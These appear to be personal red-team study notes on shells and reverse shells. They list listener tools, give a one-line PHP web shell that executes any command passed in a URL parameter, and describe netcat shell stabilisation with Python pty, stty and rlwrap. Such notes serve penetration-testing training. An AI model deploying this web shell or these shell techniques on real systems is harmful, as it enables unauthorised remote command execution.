RedTeam
4.Exploitation
Shell-and-Reverse-Shell
2.Listeners
General Information

Type of Shell

  • Shell (Normal Shell)
  • Reverse Shell (Target forced to execute code/task that connects back to your computer)
  • Blind Shell (Target is forced to execute code to start a listener attached to a shell directly on the target) -- (Limited because of Firewall)

Tools

  • Netcat ---> [[Red Team/4 - Exploitation/Shell & Reverse Shell/2 - Listeners/• Netcat]]

  • Socat ---> [[• Socat (Encrypted)]]

  • Multi/Handler (Metasploit) ---> [[• Multi Handler]]

  • Web Shell

    As PHP is still the most common server side scripting language, let's have a look at some simple code for this.

    In a very basic one line format:

    <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>

    This will take a GET parameter in the URL and execute it on the system with shell_exec(). Essentially, what this means is that any commands we enter in the URL after ?cmd= will be executed on the system -- be it Windows or Linux. The "pre" elements are to ensure that the results are formatted correctly on the page.

    Let's see this in action:

Creating Shell

  • Link Number 1
  • Link Number 2

Shell Stabilisation

Pressing Ctrl + C kills the whole thing. They are non-interactive, and often have strange formatting errors. This is due to netcat "shells" really being processes running inside a terminal, rather than being bonafide terminals in their own right. Fortunately, there are many ways to stabilise netcat shells on Linux systems. We'll be looking at three here. Stabilisation of Windows reverse shells tends to be significantly harder; however, the second technique that we'll be covering here is particularly useful for it.

  • Technique 1 (Python)

    The first technique we'll be discussing is applicable only to Linux boxes, as they will nearly always have Python installed by default. This is a three stage process:

    1. The first thing to do is use python -c 'import pty;pty.spawn("/bin/bash")', which uses Python to spawn a better featured bash shell; note that some targets may need the version of Python specified. If this is the case, replace python with python2 or python3 as required. At this point our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell.
    2. Step two is: export TERM=xterm -- this will give us access to term commands such as clear.
    3. Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.

    The full technique can be seen here:

    Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.

  • Technique 2 (rlwrap)

    rlwrap is a program which, in simple terms, gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell_;_ however, s_ome_ manual stabilisation must still be utilised if you want to be able to use Ctrl + C inside the shell. rlwrap is not installed by default on Kali, so first install it with sudo apt install rlwrap.

    To use rlwrap, we invoke a slightly different listener:

    rlwrap nc -lvnp <port>

    Prepending our netcat listener with "rlwrap" gives us a much more fully featured shell. This technique is particularly useful when dealing with Windows shells, which are otherwise notoriously difficult to stabilise. When dealing with a Linux target, it's possible to completely stabilise, by using the same trick as in step three of the previous technique: background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilise and re-enter the shell.

MsfvenomMulti Handler